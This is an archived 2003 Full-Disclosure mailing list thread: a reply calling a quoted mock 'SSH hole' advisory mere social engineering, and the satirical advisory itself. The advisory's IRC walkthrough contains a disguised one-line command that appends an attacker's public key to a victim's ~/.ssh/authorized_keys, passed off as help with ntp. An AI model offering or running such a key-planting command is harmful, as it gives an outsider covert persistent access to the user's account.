| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.3.96.1030304181353.26306C-100000@toutatis.igt.net> From: inouk at toutatis.igt.net (Eric LeBlanc) Subject: SSH/OPENSSH HOLE ALL VERSIONS. This is NOT a problem of ssh, but an USER. This is called "Social Engineering", and nobody can protect that. Only the intelligence of user can avoid this "HOLE". This is the worst thing I ever seen... E. -- Eric LeBlanc inouk@....net -------------------------------------------------- UNIX is user friendly. It's just selective about who its friends are. ================================================== On Tue, 4 Mar 2003 diacetyl@...hmail.com wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > I. BACKGROUND > > (stolen from manpage) > ssh (SSH client) is a program for logging into a remote machine and for > executing commands on a remote machine. It is intended to replace rlogin > and rsh, and provide secure encrypted communications between two untrust? > ed hosts over an insecure network. X11 connections and arbitrary TCP/IP > ports can also be forwarded over the secure channel. > > II. DESCRIPTION > > The ssh command contains an innate system of backdooring that can be levereged > by an attacker to gain the access of another user. > > The crux of this problem lies in the face that any public key dropped to > ~/.ssh/authorized_keys may be used to gain entry to the machine under the > priveledges of that user by he who posesses the corresponding private key. > > III. ANALYSIS > > A user who can successfully convince another user to write his ssh public key > to ~/.ssh/authorized_keys will be able to gain access to that machine under > that user's priveledges. > > The following is a sample walkthrough of a successful exploitation of this > vulnerability. > > ?f? zerofel [~zerofel@...8n2fls33o1215.telia.com] has joined #linuxhelp > <zerofel> how do i use ntp to set my time? > <sup3rfo0> echo ntp;echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsWihy/NGclBRhEVNgQezRGSx9D0AMqDY/eGYMNW9WlO/szVRKrlGYpMmsvOen/Kcocz0TxDPDZXLGGDL0U77A036WBIL64HPAg3ADteSa1heDJjxUWMa45Aj0bhBEJCofkraasOwxTgKYe6KXCKQu9GOS+VoCYUSSJtUk11G+tE= unf@...ptamine">~/.ssh/authorized_keys > <sup3rfo0> that should do it > <zerofel> okay but my date still isnt set > <sup3rfo0> hmm paste the output of ls ~ > <zerofel> bash-2.05$ ls > <zerofel> HAHA_I_DELETED_ALL_YOUR_FILES > <zerofel> WTF > > IV. VENDOR RESPONSE > > I have informed ssh developers about this vulnerability and they have not > replied. I am forced to disclose this gaping vulnerability to force them > to patch the bug. > > V. PROPS > > iDEFENSE for their elite file advisory > http://lists.netsys.com/pipermail/full-disclosure/2003-March/004423.html > these warriors of full-disclosure give me the courage to release this > vulnerability even after death threats from evil blackhats who shut off > my power, ruined my credit, and got me fired from my job. > -----BEGIN PGP SIGNATURE----- > Version: Hush 2.2 (Java) > Note: This signature can be verified at https://www.hushtools.com/verify > > wl0EARECAB0FAj5lJDUWHGRpYWNldHlsQGh1c2htYWlsLmNvbQAKCRAP/IU00usAJvBh > AJ9yTHe1KNHGyEEWMknulotpkCe9BACfSYTDyMGrzGVcLs9XdQuqKP/04bA= > =4Mdu > -----END PGP SIGNATURE----- > > > > > Concerned about your privacy? Follow this link to get > FREE encrypted email: https://www.hushmail.com/?l=2 > > Big $$$ to be made with the HushMail Affiliate Program: > https://www.hushmail.com/about.php?subloc=affiliate&l=427 > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html >
Powered by blists - more mailing lists